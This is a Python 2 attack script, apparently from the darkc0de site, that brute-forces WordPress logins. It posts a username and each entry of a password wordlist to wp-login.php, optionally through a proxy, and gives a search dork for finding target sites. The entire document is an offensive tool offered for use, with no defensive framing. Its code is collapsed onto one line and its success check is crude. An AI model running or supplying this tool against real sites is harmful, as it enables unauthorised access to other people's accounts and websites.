#!/usr/bin/python #WordPress Brute Force (wp-login.php) #If cookies enabled brute force will not work (yet) #Change response on line 97 if needed. (language) #Dork: inurl:wp-login.php #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import urllib2, sys, re, urllib, httplib, socket print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0" print "----------------------------------------------" if len(sys.argv) not in [4,5,6,7]: print "Usage: ./wordpressbf.py \n" print "\t -p/-proxy : Add proxy support" print "\t -v/-verbose : Verbose Mode\n" sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-p" or arg.lower() == "-proxy": proxy = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 try: if proxy: print "\n[+] Testing Proxy..." h2 = httplib.HTTPConnection(proxy) h2.connect() print "[+] Proxy:",proxy except(socket.timeout): print "\n[-] Proxy Timed Out" proxy = 0 pass except(NameError): print "\n[-] Proxy Not Given" proxy = 0 pass except: print "\n[-] Proxy Failed" proxy = 0 pass try: if verbose == 1: print "[+] Verbose Mode On\n" except(NameError): print "[-] Verbose Mode Off\n" verbose = 0 pass if sys.argv[1][:7] != "http://": host = "http://"+sys.argv[1] else: host = sys.argv[1] print "[+] BruteForcing:",host print "[+] User:",sys.argv[2] try: words = open(sys.argv[3], "r").readlines() print "[+] Words Loaded:",len(words),"\n" except(IOError): print "[-] Error: Check your wordlist path\n" sys.exit(1) for word in words: word = word.replace("\r","").replace("\n","") login_form_seq = [ ('log', sys.argv[2]), ('pwd', word), ('rememberme', 'forever'), ('wp-submit', 'Login >>'), ('redirect_to', 'wp-admin/')] login_form_data = urllib.urlencode(login_form_seq) if proxy != 0: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) opener = urllib2.build_opener(host, proxy_handler) else: opener = urllib2.build_opener(host) try: site = opener.open(host, login_form_data).read() except(urllib2.URLError), msg: print msg site = "" pass if re.search("WordPress requires Cookies",site): print "[-] Failed: WordPress has cookies enabled\n" sys.exit(1) #Change this response if different. (language) if re.search("ERROR",site) and verbose == 1: print "[-] Login Failed:",word else: print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n" print "\n[-] Brute Complete\n"